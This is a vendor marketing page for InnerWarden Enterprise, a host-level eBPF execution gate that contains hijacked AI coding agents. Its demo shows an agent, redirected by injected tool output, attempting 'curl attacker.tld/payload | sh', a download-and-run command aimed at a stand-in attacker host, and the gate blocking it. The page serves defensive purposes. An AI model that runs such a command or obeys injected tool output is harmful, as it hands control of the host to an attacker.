Skip to content
InnerWarden Enterprise

Contain a hijacked agent before the payload executes.

Prompt guards live inside the conversation the attacker controls. Enterprise puts the decision below it: on a supported Linux kernel, the Execution Gate denies unauthorized binaries at exec, and the evidence survives.

Self-hostedLocal-firstLinux eBPF LSM
Protection boundaryVerified
Production agent
Claude Code · checkout service
Scoped
Intent
Injected tool output
Escalated before execution
Kernel
Unknown binary · EPERM
Payload never started
Evidence
Outcome verified
Decision chain anchored
Compromise contained
Approved work remains available.
Interactive demo

Watch the boundary decide.

Switch between expected work and a compromised-agent path, and follow the same tool call through guard, gate, and evidence.

Interactive control pathDeterministic demo
Injected execution chain
curl attacker.tld/payload | sh
Agent runtimeClaude Code
01 · GuardESCALATED

Risk surfaced

The tool chain is classified before it reaches the host.

signal · network + shell chain
High-risk intent identified
02 · Execution GateBLOCKED

Execution denied

Pro and Enterprise enforce outside the compromised agent process.

EPERM · eBPF LSM gate
Payload never starts
03 · EvidenceANCHORED

Block preserved

Attempt, decision, and enforcing control form one record.

block hash · f2b7…1d09
Tamper-evident evidence

The agent-side context is compromised. The execution boundary is not: Linux denies the payload before it starts, then preserves the block as evidence.

Post-compromise containment

Four controls that hold after the agent is compromised.

Guardrails inside the agent reduce risk before an action. Enterprise assumes they can be bypassed, and keeps the last decision at the host.

Execution

Inside the agent's scope, only allowlisted programs start.

On supported Linux kernels, an agent-scoped eBPF LSM gate refuses a program whose path is not on the allowlist before it starts. It decides which programs start, not what an allowed one does: an allowlisted shell or interpreter still runs the script it is handed. Host workloads outside that boundary continue normally.

bprm_check_security · scoped cgroup · hard EPERM
Data and network

Secrets stay closed. Malicious domains can be refused.

Secret Read Guard protects declared sensitive paths. DNS Guard is a forwarding resolver that refuses to resolve malicious domains. It runs in observe by default. The operator arms enforce; we recommend a rehearse first, and arming does not require one. No host we run has DNS Guard in enforce today: on our public challenge box it is set to observe, and only the challenge agent is pointed at it.

file_open LSM · DNS denylist resolver · local decisions
Host response

See what actually happened, not what was claimed.

82 host detectors and 68 cross-layer correlation rules connect agent intent to process, file, identity, and network behavior.

eBPF telemetry · verified outcomes · autonomous response
Assurance

Every decision is attributable and reviewable.

Local decision history, host and tenant attribution, correction records, and signed off-host anchors create evidence for incident response and security review.

append-only records · hash chain · signed anchor
Why InnerWarden, not just a kernel hook

The hook is where it enforces. It is not what you are buying.

Open-source eBPF LSM tools exist, and a hook at exec is not the product. What InnerWarden adds is what sits around that hook for an AI agent, and each part below is something you can check.

Pre-authorised, per agent

An allowlist of the program paths one AI agent may run, checked at exec and scoped to that agent's cgroup, so the rest of the host is untouched. It decides which programs start, not what an allowed one does: an allowlisted shell or interpreter still runs the script it is handed.

Refuses an unsafe arm

It installs disarmed, and you arm it in observe first, which blocks nothing. Enforce is refused host-wide, refused while a boot-essential program is missing from the allowlist, and refused where the kernel cannot run the gate. The enforce command also waits for an observe window in which the agent ran nothing unlisted; the lower-level arm command skips that window. Disarming is one command and needs no licence.

Signed binaries you can check

Every paid host binary ships with an Ed25519 signature that the installer checks against a key it pins, and refuses to install on a mismatch. The security pack gives the commands to check a binary yourself.

A record you can verify

Every decision and every response goes into a hash-chained audit trail on the host: change or delete an old record and the chain breaks from that point.

Decided and applied on the host

The sensor detects, the agent decides and applies the response, and the record stays on the host, with no cloud control plane. Triage can call a cloud model you configure (bring your own key, off by default), and our public challenge box uses one.

Why not Tetragon, KubeArmor, Falco or your EDR?

Each is good at what it is built for, and each can run next to InnerWarden. What each is built for:

Falco
Detects suspicious activity from kernel events and raises an alert. It is built to tell you; refusing the exec takes another tool.
Tetragon
Observes kernel events and enforces the policies you write for it, most often per Kubernetes workload.
KubeArmor
Enforces least-permissive policies you write for pods, containers and hosts, through the kernel's LSM.
Your EDR
Watches the whole host for behaviour that looks malicious, and responds once it is seen.

InnerWarden is built around one AI agent instead: its allowlist is scoped to that agent, arming refuses a host-wide enforce and a missing boot essential, the free guardrail screens the agent's commands and tool calls before they run, and the record of what it tried stays on the host.

A safer route to enforcement

Observe, rehearse, then enforce.

Configuration is not protection. The live control must be compatible, scoped, armed, and verified before the dashboard is allowed to claim enforcement, so production is never the policy test.

01

Observe real work

Establish the agent, host, and workload boundary without changing execution.

02

Rehearse the policy

Measure exactly what would be denied and resolve legitimate paths before cutover.

03

Enforce deliberately

Arm only on a compatible Linux host after a clean rehearsal and explicit operator approval.

04

Verify continuously

Compare configured state with the live kernel and retain the resulting evidence.

How to install it

One command on a Linux host, plus a license.

The paid stack installs on a Linux server and comes up in observe mode: it watches the machine and explains what it sees, and blocks nothing until you decide it should.

curl -fsSL https://innerwarden.com/install | sudo bash -s -- --license=/path/to/license.key

Installs the eBPF sensor, the host detectors, cross-layer correlation, autonomous response, and the paid capabilities (Execution Gate, DNS Guard, anti-tamper watchdog). Linux only: eBPF needs a recent kernel and root. Prefer to read it first? Download the script, review it, then run it. Flags: ... | sudo bash -s -- --help

  1. 1. Get a license.

    Pro is bought online, per protected agent; Enterprise is scoped per deployment. Both install this same stack. Compare the tiers, or start a scoped pilot.

  2. 2. Install and activate.

    Run the command above on the host, passing the license key we sent you. The license is what selects the paid tier, so it goes in the install command rather than after it. It stays in observe: nothing is blocked yet.

  3. 3. Observe, rehearse, then enforce.

    Follow the rollout above. The dashboard only claims enforcement once the live control is compatible, scoped, armed, and verified.

Full steps, verification, and the unattended flags are in the install documentation. Already running the free guardrail? It keeps working: the paid tier adds the host layer underneath it.

The honest product boundary

Know exactly what you are buying.

Community is deliberately useful on its own. The paid tiers are not a feature unlock dressed as security: Pro adds the host-enforced boundary that is verified before it claims enforcement, and Enterprise runs it across a fleet.

What Community gives every user

Cross-platform command and MCP screening, agent discovery, AI Jail sandboxing on platforms that support it, local decisions, dashboard, token intelligence, and alerts.

What Pro adds

The Linux host sensor, eBPF visibility, agent-scoped kernel controls and autonomous response. See the pricing page for the full breakdown.

What Enterprise adds on top

The same stack across many hosts under one agreement, fleet operations across them, and the services: curated policy, a quarterly assurance audit, SLA and support.

What survives an agent compromise

In-path MCP proxy controls and the armed host or kernel boundary. Advisory checks alone remain bypassable if a hostile agent refuses to call them.

What the kernel guarantee requires

A supported Linux kernel with BPF LSM active, a verified live gate, an explicit scope, and a completed observe-and-rehearse workflow.

Compare the tiers
Production security pilot

Prove one critical agent workflow end to end.

We scope one agent, one threat model, one Linux deployment, and measurable pass/fail criteria. You finish with a tested control boundary and evidence your security team can review.

What the pilot includes
  • Architecture and threat-model workshop
  • Observe and rehearsal baseline
  • Controlled attack validation
  • Evidence review and rollout plan

Not ready for a production pilot? Install free and start building the agent decision history today.

Sent to our self-hosted Mautic instance. By submitting, you agree that we may contact you about InnerWarden early access. See our privacy policy.